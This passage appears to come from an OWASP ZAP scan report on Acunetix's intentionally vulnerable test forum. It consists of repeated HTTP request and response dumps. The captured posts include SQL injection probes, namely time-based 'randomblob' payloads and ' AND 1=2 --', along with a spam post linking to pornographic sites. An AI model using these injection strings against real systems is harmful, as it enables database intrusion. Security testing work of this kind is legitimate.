<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 84 |
| Solution | |
| Reference | https://owasp.org/wstg |
| Tags | |
| CWE Id | |
| WASC Id | |
| Plugin Id | 10104 |
|
Informational |
User Controllable HTML Element Attribute (Potential XSS) |
|---|---|
| Description |
This check looks at user-supplied input in query string parameters and POST data to identify where certain HTML attribute values might be controlled. This provides hot-spot detection for XSS (cross-site scripting) that will require further review by a security analyst to determine exploitability.
|
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | GET |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | GET |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4138 |
| Response Body - size: 4,138 bytes. |
